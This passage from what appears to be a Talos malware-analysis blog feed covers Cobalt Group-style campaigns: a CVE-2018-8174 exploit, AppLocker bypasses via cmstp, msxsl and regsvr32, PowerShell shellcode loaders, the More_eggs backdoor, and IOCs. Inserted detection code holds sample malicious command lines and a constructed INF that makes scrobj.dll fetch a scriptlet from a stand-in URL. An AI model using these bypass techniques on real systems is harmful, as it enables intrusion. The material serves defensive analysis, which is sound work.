More recent attacks also attempted to exploit an Internet Explorer vulnerability (CVE-2018-8174), triggered from an RTF document through an embedded URL moniker object. The embedded object triggers a download of an HTML page containing the VBScript that exploits the vulnerability and launches the shellcode. The HTML component of the exploit is based on the [original exploit code](<https://github.com/0x09AL/CVE-2018-8174-msf/blob/master/CVE-2018-8174.rb>) discovered in May this year.

[](<https://3.bp.blogspot.com/-VQElnaC_rFk/W17-HJYF24I/AAAAAAAAAKQ/UuzjsRpWFC0FjprY1D4IKnxCRzZVeOOCACLcBGAs/s1600/image11.png>)

CVE-2018-8174 VB script exploit code

### Stage 3 — Scriptlets, scripts and DLLs

#### AppLocker bypass attempts (cmstp, msxsl, regsvr32)

When Microsoft added the [AppLocker](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview>) feature to Windows to give defenders application control, security researchers began working on the offensive side to search for ways to circumvent it.

Windows AppLocker allows administrators to control which executable files are allowed or denied execution. Administrators can create rules based on file names, publishers or file location that allow only certain files to execute.

AppLocker works well for executables, and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code.

A number of legitimate Windows executables that are not blocked by the default AppLocker policies have been discovered, and various proof-of-concept AppLocker bypass code has become publicly available.

Notable applications used in these attacks are cmstp and msxsl. The Microsoft Connection Manager Profile Installer (cmstp.exe) is a command-line program used to install Connection Manager service profiles. Cmstp accepts an installation information file (INF) as a parameter and installs a service profile used for remote access connections. A malicious INF file can be supplied as a parameter to download and execute remote code.

[](<https://1.bp.blogspot.com/-01dBXdNmHi0/W17-MyfaB3I/AAAAAAAAAKU/dTxSt_4XCxk1ZEsDth4hMNFrXtSIuCO1gCLcBGAs/s1600/image13.png>)

Example malicious INF file to load a remote SCT file

Cmstp may also be used to load and execute COM scriptlets (SCT files) from remote servers.

[](<https://4.bp.blogspot.com/-t1kB4rHAG50/W17-TdNqoSI/AAAAAAAAAKc/qrPydgygPsg-1qur8hMEWQTw30zBkFf5ACLcBGAs/s1600/image14.png>)

Example of malicious scriptlet file used to drop a malicious DLL dropper for the next stage

Microsoft allows developers to create COM+ objects in script code stored in an XML document, a so-called scriptlet file. Although it is common to use JScript or VBScript, as they are available in Windows by default, a scriptlet can contain COM+ objects implemented in other languages, including Perl and Python, which would be fully functional if the respective interpreters are installed.

To bypass AppLocker and launch script code within a scriptlet, the attacker places the malicious code within an XML script tag inside the registration tag of the scriptlet file and calls cmstp with the appropriate parameters. For example:

[](<https://1.bp.blogspot.com/--GAX77Bz0uo/W17-aMAryqI/AAAAAAAAAKk/vpAxkKo_9XEOZRx-PFDRzS_HHsozvDa0QCLcBGAs/s1600/image23.png>)

Here, the attackers randomize the scriptlet name and use a .txt filename extension, likely in an attempt to bypass basic protection mechanisms that block file types based on the filename extension.

[](<https://1.bp.blogspot.com/--4T8-32yVdQ/W17-fzh7IOI/AAAAAAAAAKs/EByqWQZY6gM9tuf2bCrd3olMJKDv82miwCLcBGAs/s1600/image22.png>)

Payload dropper in an XSL file

Another executable used to attempt to bypass AppLocker is msxsl.exe, a Microsoft command-line utility (not shipped with Windows by default) used to run XSL (eXtensible Stylesheet Language) transformations. Msxsl.exe is dropped together with its parameters by the previous attack stage, a DLL dropper, and run to continue the infection chain.

It takes an XML and an XSL file as parameters, but it also loads the script engine and runs the script code within the <msxsl:script> tag of the supplied XSL file when that code is invoked from within an <xsl:value-of> tag.

[](<https://4.bp.blogspot.com/-yWOLoSU6LRA/W17-ktBBuiI/AAAAAAAAAK0/IlHWY7YeMDQoJy1xN7jZH0YjGnpMJ2uAwCLcBGAs/s1600/image19.png>)

Invoking the JScript code of the payload dropper within an XSL file

The supplied XML file seems to be randomly generated and is used simply because the second parameter is required; it is of no further interest for analysis.
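The three living-off-the-land executables in this section (cmstp fed an INF that points scrobj.dll at a scriptlet, msxsl running the script inside an XSL file, and regsvr32 loading a scriptlet or a non-.dll COM server) leave recognisable process-creation traces. The following is an added example, not code from the Talos post, that flags those traces over a few constructed process-creation records and checks an INF body for the scriptlet-loading pattern. The records, paths and INF text are assumptions made for the example; the INF layout follows the publicly documented cmstp bypass, which the post shows only as a screenshot.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed process-creation records (image path, command line); none are real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\cmstp.exe",
     r"cmstp.exe /ni /s C:\Users\bob\AppData\Local\Temp\3381.txt"),
    (r"C:\Users\bob\AppData\Local\Temp\msxsl.exe",
     r"msxsl.exe C:\Users\bob\AppData\Local\Temp\a.xml C:\Users\bob\AppData\Local\Temp\a.xsl"),
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s /n /u /i:C:\Users\bob\AppData\Local\Temp\8712.txt scrobj.dll"),
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Users\bob\9242.txt"),
    (r"C:\Windows\System32\cmstp.exe",
     r"cmstp.exe /s C:\ProgramData\VPN\profile.inf"),          # plausible legitimate use
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe readme.txt"),
]

# Constructed INF in the publicly documented cmstp bypass layout (an assumption, not from the post).
SAMPLE_INF = r"""
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://cloud.example.invalid/robots.txt

[Strings]
AppAct="SOFTWARE\Microsoft\Connection Manager"
ServiceName="Example"
ShortSvcName="Example"
"""

BENIGN_INF = r"""
[version]
Signature=$chicago$

[DefaultInstall]
CopyFiles=ProfileFiles

[ProfileFiles]
profile.cms
"""

@dataclass
class Finding:
    technique: str
    reason: str

USER_WRITABLE = re.compile(r"\\(users|programdata|temp|appdata)\\", re.I)

def _tokens(cmdline: str) -> list:
    # Keep quoted paths together; shlex's POSIX mode would eat the backslashes.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify(image: str, cmdline: str) -> Optional[Finding]:
    name = image.rsplit("\\", 1)[-1].lower()
    args = _tokens(cmdline)[1:]
    flags = {a.lower() for a in args if a.startswith("/")}
    files = [a for a in args if not a.startswith("/")]
    if name == "cmstp.exe":
        # /ni (no icon) /s (silent) with a "profile" that is not even an .inf is the
        # combination used to feed cmstp an INF that hands scrobj.dll a scriptlet.
        if {"/ni", "/s"} <= flags or any(not f.lower().endswith(".inf") for f in files):
            return Finding("cmstp-inf", f"cmstp.exe {sorted(flags)} installing {files}")
    elif name == "msxsl.exe":
        # msxsl.exe is a separate Microsoft download, not part of Windows; here it is
        # dropped and run from user space with an XSL whose <msxsl:script> carries the code.
        return Finding("msxsl-xsl-script", f"msxsl.exe run from {image} with {files}")
    elif name == "regsvr32.exe":
        if any(a.lower().startswith("/i:") for a in args) and "scrobj.dll" in [a.lower() for a in args]:
            return Finding("regsvr32-scrobj-scriptlet", "scrobj.dll given a scriptlet via /i:")
        if files and USER_WRITABLE.search(files[-1]) and not files[-1].lower().endswith(".dll"):
            return Finding("regsvr32-nondll-com-server", f"registering {files[-1]} as a COM server")
    return None

def scan(events):
    """Return (command line, finding) for every record that matched."""
    out = []
    for image, cmdline in events:
        finding = classify(image, cmdline)
        if finding:
            out.append((cmdline, finding))
    return out

def inf_loads_remote_scriptlet(inf_text: str) -> bool:
    """True when an OCX (un)register section points scrobj.dll at a URL or a scriptlet file."""
    sections, current = {}, None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    ocx_sections = set()
    for lines in sections.values():
        for line in lines:
            key, _, value = line.partition("=")
            if key.strip().lower() in ("registerocxs", "unregisterocxs"):
                ocx_sections.add(value.strip().lower())
    for name in ocx_sections:
        for line in sections.get(name, []):
            if "scrobj.dll" in line.lower() and re.search(r"https?://|\.sct\b|\.txt\b", line, re.I):
                return True
    return False

if __name__ == "__main__":
    for cmdline, finding in scan(SAMPLE_EVENTS):
        print(f"{finding.technique:28} {finding.reason}")
    print("sample INF loads a scriptlet:", inf_loads_remote_scriptlet(SAMPLE_INF))
```

The rules deliberately key on the combination the post describes (silent cmstp with a non-INF "profile", msxsl at all, regsvr32 with `/i:` and scrobj.dll, or a COM server registered from a user-writable path under a non-.dll name) rather than on the executable names alone, which all have legitimate uses; the INF check catches the same technique at the file level when the command line was not logged.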
\n \n\n\n#### DLL dropper\n\n \nAn earlier part of the second stage is implemented as an encrypted JScript scriptlet which eventually drops a randomly named COM server DLL binary with a .txt filename extension, for example, 9242.txt, in the user's home folder and registers the server using the regsvr32.exe utility. \n \nThe dropper contains an encrypted data blob that is decrypted and written to the disk. The dropper then launches the next stage of the attack by starting PowerShell, msxsl or cmstp.exe as described above. \n \nOnce the DLL dropper is finished with its activity, it will be deleted from the drive, which may be one of the reasons why there are not too many DLL dropper samples available in public malware repositories. \n \n[](<https://4.bp.blogspot.com/-FUssIdEGZ74/W17-pu7gUyI/AAAAAAAAAK8/yjmsM4PjLyQCDK0FSM-5uhDZl4YB0mSowCLcBGAs/s1600/image8.png>) \n\n\nExported functions of the two observed variations of the dropper DLLs\n\n \nFrom the observed samples, it seems that the attacker has access to the source code of two legitimate DLLs which they modify to include the malicious dropper code. They can be distinguished by looking at the names of the exported functions. The exported names seem legitimate and should not be used as a basis for the malware detection. \n \n\n\n### Stage 4 \u2014 Downloaders\n\n#### PowerShell leading to shellcode\n\nThe PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. \n \n[](<https://4.bp.blogspot.com/-6bulFpmOTNc/W17-vzD3EEI/AAAAAAAAALE/8wC16ghptEgkgQBIwUgfF6Wgy8Zk9pHMwCLcBGAs/s1600/image12.png>) \n\n\nFirst PowerShell stage with base64 encoded code\n\n \nThe first PowerShell stage is a simple downloader that downloads the next PowerShell stage and launches a child instance of powershell.exe using the downloaded, randomly named script as the argument. 
\n \n[](<https://4.bp.blogspot.com/-gmVjHvVlq64/W17-1TotPXI/AAAAAAAAALM/Y6g2lhH0pK4iGMfrTSkWwy4_8hU7ibg9ACLcBGAs/s1600/image1.png>) \n\n\nPowerShell downloader\n\n \nThe downloaded PowerShell script code is obfuscated in several layers before the last layer is reached. The last layer loads shellcode into memory and creates a thread within the PowerShell interpreter process space. \n \n[](<https://2.bp.blogspot.com/-gPIxAH_xinM/W17-7FlPf9I/AAAAAAAAALU/V26lJXD_VX8kH0eIdoRdXGmzbr2329clQCLcBGAs/s1600/image18.png>) \n\n\nPowerShell stage shellcode loader\n\n \nThis PowerShell code used in the final stage to launch shellcode is publicly available as a part of an open-source antivirus evasion framework DKMC (Don't Kill My Cat) released in 2016, but it is [also connected](<http://www.offensiveops.io/tools/cobalt-strike-bypassing-windows-defender-with-obfuscation/>) with the [Cobalt Strike framework](<https://www.cobaltstrike.com/>). \n \n[](<https://1.bp.blogspot.com/-EHVISptWDJo/W17_B4Fv7VI/AAAAAAAAALc/mlBaervlqIcozc2Y-nuggcORAWmFFqw6wCLcBGAs/s1600/image4.png>) \n\n\nBeginning of the \"download and load\" shellcode\n\n \nThe shellcode is relatively simple and begins with a XOR loop that deobfuscates the rest of the code. The most important function is the one that resolves the various API addresses using a checksum of the API name as the parameter, traverses the PEB linked list of loaded modules to find the required module, traverses the list of module exports to find the required API and finally jumps (calls) the found API function. The main purpose of the shellcode is to download an encrypted payload over HTTPS, decrypt it in memory and launch it. \n \n\n\n#### JScript downloader\n\nAs opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. 
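Before following the JScript chain, an added example for the PowerShell-side shellcode described above. It is not the post's code; it reimplements in Python the two steps the post names, the XOR deobfuscation loop and API resolution by a checksum of the API name, so the behaviour can be checked offline. The post does not say which checksum this sample uses, so the ROR13 scheme of Metasploit's block_api (module name upper-cased as UTF-16LE, then the function name, both including the terminating null) is assumed here because the loader is Cobalt Strike/DKMC derived; the export lists, the XOR key and the encoded blob are constructed for the example.

```python
import struct

MASK = 0xFFFFFFFF

def ror13(value: int) -> int:
    """32-bit rotate right by 13, the `ror edi, 13` of the resolver loop."""
    return ((value >> 13) | (value << 19)) & MASK

def ror13_hash(data: bytes) -> int:
    """Per byte: rotate the running hash, then add the byte (`ror edi,13; add edi,eax`)."""
    h = 0
    for b in data:
        h = (ror13(h) + b) & MASK
    return h

def api_hash(module: str, func: str) -> int:
    # Assumed block_api scheme: upper-cased UTF-16LE module name including its
    # two null bytes, plus the ASCII function name including its null.
    mod = ror13_hash(module.upper().encode("utf-16le") + b"\x00\x00")
    fn = ror13_hash(func.encode("ascii") + b"\x00")
    return (mod + fn) & MASK

# Constructed stand-in for what the shellcode gets by walking the PEB's
# InMemoryOrderModuleList and each module's export name table.
EXPORTS = {
    "kernel32.dll": ["LoadLibraryA", "VirtualAlloc", "CreateThread", "ExitProcess"],
    "wininet.dll": ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                    "HttpSendRequestA", "InternetReadFile"],
}

def build_lookup(exports: dict) -> dict:
    """hash -> 'module!function': what an analyst precomputes to read the hashes in shellcode."""
    table = {}
    for module, funcs in exports.items():
        for func in funcs:
            h = api_hash(module, func)
            if h in table:
                raise ValueError(f"collision: {table[h]} vs {module}!{func}")
            table[h] = f"{module}!{func}"
    return table

def resolve(hashes, table: dict):
    return [table.get(h, f"unknown:{h:#010x}") for h in hashes]

def xor_bytes(blob: bytes, key: int) -> bytes:
    """The single-byte XOR loop at the head of the shellcode (it is its own inverse)."""
    return bytes(b ^ key for b in blob)

# Constructed "obfuscated" hash list: four little-endian DWORDs XORed with one key byte,
# in the order a download-and-load stub would need them.
XOR_KEY = 0x5A
PLAIN_HASHES = [api_hash("wininet.dll", "InternetOpenA"),
                api_hash("wininet.dll", "InternetReadFile"),
                api_hash("kernel32.dll", "VirtualAlloc"),
                api_hash("kernel32.dll", "CreateThread")]
ENCODED_BLOB = xor_bytes(b"".join(struct.pack("<I", h) for h in PLAIN_HASHES), XOR_KEY)

def recover_api_names(blob: bytes, key: int, table: dict):
    """Deobfuscate the blob, split it into DWORD hashes and name each one."""
    plain = xor_bytes(blob, key)
    hashes = [struct.unpack_from("<I", plain, off)[0] for off in range(0, len(plain), 4)]
    return resolve(hashes, table)

if __name__ == "__main__":
    for name in recover_api_names(ENCODED_BLOB, XOR_KEY, build_lookup(EXPORTS)):
        print(name)
```

The point of the lookup table is the reverse direction of what the shellcode does: the shellcode hashes every export it walks until one matches the constant it carries, whereas an analyst hashes the exports of the DLLs that matter once and then reads the constants straight out of a sample. Any checksum scheme can be dropped into `api_hash` if a sample turns out to use a different one.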
In this infection chain, the DLL dropper drops a JScript downloader, which eventually downloads the JScript backdoor payload from the C2 server.

[](<https://4.bp.blogspot.com/-9z1ezb5Nd6g/W17_HTR8_cI/AAAAAAAAALg/55IwR3pU-IkQRtO3rXk7QrfjCcXfX_opACLcBGAs/s1600/image3.png>)

JScript downloader which downloads and launches a randomly named backdoor

The final payload is another obfuscated scriptlet file that is started by launching regsvr32.exe with the /U (unregister) command-line option, which calls into the scrobj.dll scriptlet host with the downloaded scriptlet file as an argument.

### Stage 5 — Payloads

#### JScript backdoor

On the JScript side of the observed campaign's infection chain, the final payload is a fully functional JScript backdoor known as "More_eggs," after one of the variable names present in its code.

The functionality of the backdoor is typical for this type of malware and allows the attacker to control the infected machine over an HTTPS-based C2 protocol. The backdoor connects to its initial gate on a regular basis to check for the next commands submitted by the attacker.

The command set is relatively limited, but sufficient to instruct the backdoor to download and execute a new payload, remove itself from the system, or download and launch additional scriptlets. During the research, we did not observe other binary payloads downloaded by the JScript backdoor, but they are likely to be present in a real environment.

Looking at our Umbrella Investigate telemetry, there was a low level of activity for most of the C2 servers. However, for one of them, api.outlook.kz, we observed a regular pattern of moderate usage over a period of a few weeks, with the majority of the queries coming from the U.S., followed by Germany and Turkey.

[](<https://2.bp.blogspot.com/-payTYwnje7Y/W17_OaKZBRI/AAAAAAAAALk/dHlE7frKrKguIgLsPP1ouklSg8-e4Bz9QCLcBGAs/s1600/image16.png>)

DNS queries for api.outlook.kz backdoor C2 host

The backdoor fingerprints the targeted system and sends back the acquired information, including the installed anti-malware program, the version of the installed operating system, the local IP address, the name of the infected computer, the username and other characteristics that uniquely describe the infected system.

[](<https://4.bp.blogspot.com/-ti5Akdwucxo/W17_T_uiPSI/AAAAAAAAALs/WFgiTTIsseQn1I_AgIorhcIOC_i0ECwpACLcBGAs/s1600/image7.png>)

Two More_eggs backdoor versions, possibly two different groups?

There are definite similarities between these attacks, primarily in the type of exploit, but also in the C2 infrastructure and the kind of payload used. However, that does not mean they can be attributed to a single actor.

There are at least two different versions of the JScript backdoor in use, version 2.0 and version 4.4. Interestingly, in version 4.4 the attackers added a variable "researchers" initialized to the string "We are not cobalt gang, stop associating us with such skids!", which may indicate that more than one actor using very similar TTPs was active during the same period.

#### Cobalt Strike beacon

On the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality.

Cobalt Strike beacons can be compared with Meterpreter, a part of the Metasploit framework. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but, just like Meterpreter, it is generally detected by anti-malware software because it can easily be used by malicious actors.

The beacon payload allows attackers to maintain full control over the infected system and pivot to other systems as required, harvest user credentials, execute code with a UAC bypass, escalate the beacon's privileges using different mechanisms, and so on. An in-depth analysis of a Cobalt Strike beacon payload is outside the scope of this post.

### Conclusion/Summary

[](<https://3.bp.blogspot.com/-LOlYsj4fYlc/W17_auF7x3I/AAAAAAAAALw/DHPn4Y-234AnXZwfcYHgHy5lkX-ZO1howCLcBGAs/s1600/image17.jpg>)

Breadth of the observed campaigns

Attackers have to create a reliable and adaptable infrastructure to be able to launch attacks continually over an extended period of time. This sometimes requires the development of proprietary tools, with the advantage of full control over them but a higher initial investment.

On the other hand, attackers can choose off-the-shelf tools such as the ones described, which can serve their purposes equally well if they are disguised.

We have documented the activities of several related malware campaigns targeting users in the financial industry, as well as other businesses, with a potential for financial return. We chose to cover these campaigns to showcase the breadth of TTPs required for successful targeted attacks, ranging from proper reconnaissance all the way to delivery of the final payload through several intermediate infection stages.

The TTPs we observed over the past two months are consistent with the previous activity of the so-called Cobalt Group.

However, we have found some payloads that contain a message for researchers stating that the attackers are not the Cobalt Group, which may indicate that the attacks are conducted by different actors despite the commonalities in TTPs.

Although the attacks are conducted using readily available tools, the attackers show a high level of technical knowledge, judging by their ability to combine those tools into a number of successful campaigns delivering different payloads to gain an initial foothold in their targets and provide a platform for further attack stages toward their ultimate goal, which is likely financial gain.

### Coverage

Additional ways our customers can detect and block this threat are listed below.

[](<https://4.bp.blogspot.com/-_H0ODecG0RQ/W17_kFfhdfI/AAAAAAAAAL4/grFyyVRTKhUNxWganFRyJDucbw2iw2mGgCLcBGAs/s1600/image9.png>)

Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects the malware used in these attacks.

[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign.

Network security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and builds protection into all Cisco Security products.

[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack, available for purchase on [Snort.org](<https://www.snort.org/products>).
\n \n \n \n\n\n### IOCs\n\n \n\n\n#### RTFs\n\naf9ed7de1d9d9d38ee12ea2d3c62ab01a79c6f4b241c02110bac8a53ea9798b5 \ne4081eb7f47d76c57bbbe36456eaa4108f488ead5022630ad9b383e84129ffa9 \nbebd4cd9aece49fbe6e7024e239638004358ff87d02f9bd4328993409da9e17c \n7762bfb2c3251aea23fb0553dabb13db730a7e3fc95856d8b7a276000b9be1f5 \na1f3388314c4abd7b1d3ad2aeb863c9c40a56bf438c7a2b71cbcff384d7e7ded \ndc448907dd8d46bad0e996e7d23dd35ebe04873bc4bb7a8d26feaa47d09d1eab \ncbbf2de2fbd4bce3f9a6c7c2a3efd97c729ec506c654ce89cd187d7051717289 \n40f97cf37c136209a65d5582963a72352509eb802da7f1f5b4478a0d9e0817e8 \n \n\n\n#### DOC(x)s\n\ne566db9e491fda7a5d28ffe9019be64b4d9bc75014bbe189a9dcb9d987856558 \n9ddc22718945ac8e29748999d64594c368e20efefc4917d36fead8a9a8151366 \n1247e1586a58b3be116d83c62397c9a16ccc8c943967e20d1d504b14a596157c \n \n\n\n#### Dropper DLLs\n\ncc2e9c6d8bce799829351bd25a64c9b332958038365195e054411b136be61a4f \n0fef1863af0d7da7ddcfd3727f8fa08d66cd2d9ab4d5300dd3c57e908144edb6 \n74af98fb016bf3adb51f49dff0a88c27bf4437e625a0c7557215a618a7b469a1 \n844f56b5005946ebc83133b885c89e74bc4985bc3606d3e7a342a6ca9fa1cc0e \n \n\n\n#### Scriptlets\n\n283f733d308fe325a0703af9857f59212e436f35fb6063a1b69877613936fc08 \nafeabc34e3260f1a1c03988a3eac494cc403a88711c2391ea3381a500e424940 \n3b73ebb834282ae3ffcaeb3c3384fd4a721d78fff5e7f1d5fd63a9c244d84c48 \n4afba1aa6b58dc3754fe2ff20c0c23ce6371ba89094827fe83bb994329fa16a3 \n \n\n\n#### PDFs\n\n5ac1612535b6981259cfac95efe84c5608cf51e3a49b9c1e00c5d374f90d10b2 \n9d6fd7239e1baac696c001cabedfeb72cf0c26991831819c3124a0a726e8fe23 \ndf18e997a2f755159f0753c4e69a45764f746657b782f6d3c878afb8befe2b69 \n \n\n\n#### Decoy document\n\nf1004c0d6bf312ed8696c364d94bf6e63a907c80348ebf257ceae8ed5340536b \n \n\n\n#### Executable payloads\n\nf266070d4fe999eae02319cb42808ec0e0306125beda92f68e0b59b9f5bcac5a \nfc004992ad317eb97d977bd7139dbcc4f11c4447a26703d931df33e72fd96db3 \n \n\n\n#### URLs - docs\n\nhxxp(s)://swift-fraud[.]com/documents \nhxxp://95[.]142[.]39[.]109/e1.txt 
\nhxxps://kaspersky-security[.]com/Complaint.doc \nhxxps://mcafeecloud[.]us/complaints/67972318.doc \nhxxps://s3[.]sovereigncars[.]org[.]uk/inv005189.pdf \n \n\n\n#### URLs - JS backdoor\n\n##### Stage 1 - drop DLL dropper\n\nhxxp://nl.web-cdn.kz \nhxxp://mail[.]halcyonih[.]com/m.txt \nhxxp://mail[.]halcyonih[.]com/humans.txt \nhxxp://secure[.]n-document[.]biz/humans.txt \nhxxp://xstorage[.]biz/robots.txt \nhxxp://cloud[.]yourdocument[.]biz/robots.txt \nhxxp://cloud-direct[.]biz/robots.txt \nhxxp(s)://documents[.]total-cloud[.]biz/version.txt \nhxxp://cloud[.]pallets32[.]com/robots.txt \nhxxp://document[.]cdn-one[.]biz/robots.txt \n \n\n\n##### Backdoor C2\n\nhxxps://api[.]outlook[.]kz \nhxxp://api[.]fujitsu[.]org[.]kz \nhxxp://api[.]asus[.]org[.]kz \nhxxp://api[.]toshiba[.]org[.]kz \nhxxp://api[.]miria[.]kz \nhxxp(s)://outlook[.]live[.]org[.]kz \n \n\n\n#### Powershell Stage\n\nhxxp://95[.]142[.]39[.]109/driver \nhxxp://95[.]142[.]39[.]109/wdriver \n \n\n\n#### Decoy document\n\nhxxp://95[.]142[.]39[.]109/document.doc \n \n\n\n#### Cobalt Strike beacon stage\n\nhxxps://95[.]142[.]39[.]109/vFGY\n\n", "cvss3": {}, "published": "2018-07-31T09:38:00", "type": "talosblog", "title": "Multiple Cobalt Personality Disorder", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-8174"], "modified": "2018-08-01T07:09:30", "id": "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/PZ9apzQhMfA/multiple-cobalt-personality-disorder.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-14T18:08:43", "description": "<h3 id=\"h.o562lfhybzl7\">Introduction</h3><br />Since public disclosure in April 2017, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199\">CVE-2017-0199</a> has been frequently used within malicious Office documents. 
The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.<br /><br />In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158\">CVE-2012-0158</a>, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.<br /><br />Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.<br /><br /> Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.<br /> <br /> Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn\u2019t quite work out, or it may be indication of future attacks yet to materialise.<br /> <a name='more'></a><br /><br /><h3 id=\"h.8er5iyy5kysj\">Standard CVE-2017-0199 exploitation</h3><div><br /></div>A typical attack exploiting CVE-2017-0199 consists of an email campaign, distributing a malicious RTF document.The vulnerability exists in code that handles Ole2Link embedded objects. 
Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word.<br /><br /><a href=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s1600/image3.png\" imageanchor=\"1\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s640/image3.png\" width=\"640\" /></a> <br /><div style=\"text-align: center;\">Standard CVE-2017-0199 flow</div><br />If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s1600/image13.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"309\" data-original-width=\"1438\" height=\"138\" src=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s640/image13.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt</div><div style=\"text-align: center;\"><br /></div><h3 id=\"h.roxzrd10uaho\">Modified CVE-2017-0199 flow</h3><br />In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. 
Referring to the attachment as a purchase order coming from an unknown \"partner\" is a very common social engineering trick of spammed malware. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s1600/image6.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"461\" data-original-width=\"1049\" height=\"280\" src=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s640/image6.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Email message launching the modified attack</div><div style=\"text-align: center;\"><br /></div>The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve. <br /><br />The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before 